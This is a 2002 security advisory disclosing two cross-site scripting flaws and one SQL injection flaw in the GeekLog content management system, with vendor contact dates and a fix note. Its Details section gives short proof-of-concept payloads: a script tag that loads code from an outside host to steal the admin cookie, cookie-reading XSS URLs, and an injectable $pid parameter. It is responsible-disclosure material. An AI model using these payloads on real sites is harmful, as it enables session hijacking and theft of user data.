[ARL02-A13] Multiple Security Issues in GeekLog

[Ahmet Sabri ALPER <s_alper () hotmail com>]

+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\-------  Security Advisory  -----/---------/+
+/----------\------    ID: ARL02-A13    ----/----------/+
+/-----------\----- salper () olympos org  ---/-----------/+


Advisory Information
--------------------
Name               : Multiple Security Issues in GeekLog
Software Package   : GeekLog
Vendor Homepage    : http://geeklog.sourceforge.net/
Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
Platforms          : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted   : 31/05/2002
Vendor Replied     : 01/06/2002
Prior Problems     : N/A
Current Version    : v1.3.5rc1 (vulnerable)


Summary
-------
GeekLog is a web content management system suitable for 
running full-featured community sites. It supports article 
posting, threaded comments, event scheduling, and link 
management and is built around a design philosophy that 
emphasizes ease of use.

I have found these issues while testing the GeekLog system 
which was to be used at http://www.olympos.org, "Olympos 
Turkish Security Portal".
2 different types of Cross Site Scripting issues, plus 
1 SQL Injection vulnerability was found in GeekLog.


Details
-------
1. When any user sends a new Calender Event, the form is submitted 
to the site admin for approval. The $url variable, which holds the 
data given in the "Link" section of the form, is not filtered for 
malicious code. So a malicious user may get the cookie of the site 
administrator and therefore "own" the site.
Also this issue may be exploited to run malicious code on the GeekLog 
site.
Proof-of-concept Link input ($url):
<script src="http://forum.olympos.org/f.js";>Alper</script>

2. Maliciously crafted links from third party sites may allow Cross 
Site Scripting attacks via "index.php" and/or "comment.php". 
Two examples for this;
/index.php?topic=<script>alert(document.cookie)</script>
/comment.php?mode=display&sid=foo&pid=18&title=<script>alert
(document.cookie)</script>&type=article

3. The $pid variable is directly passed to SQL input. This makes it 
possible for attackers to launch SQL injection attacks.
/comment.php?
mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

As the "Magic Quotes" function of PHP escapes the quoting characters, 
this third issue might just cause "light" headaches, but if the "Magic 
Quotes" is not active, the attacker may be able to get all the information 
about users from the SQL tables.


Solution
--------
The vendor replied and acted quickly.
A patch or a new version pointing this issue will
soon be available via CVS or a FTP download from:
http://www.sourceforge.net/projects/geeklog
or
http://geeklog.sourceforge.net

The development team of GeekLog said that; they will 
be cleaning out the code for similar security issues, 
which were mentioned above.


Credits
-------
Discovered on 31, May, 2002 by 
Ahmet Sabri ALPER <salper () olympos org>
ALPER Research Labs.

The ALPER Research Labs. [ARL] workers are freelancer 
security professionals and WhiteHat hackers. The ARL 
workers are available for hiring for legal jobs.
The ARL also supports Open Software Community, by detecting 
possible security issues in GPL or any other Public Licensed 
product.


References
----------
Product Web Page: http://geeklog.sourceforge.net/
Olympos: http://www.olympos.org/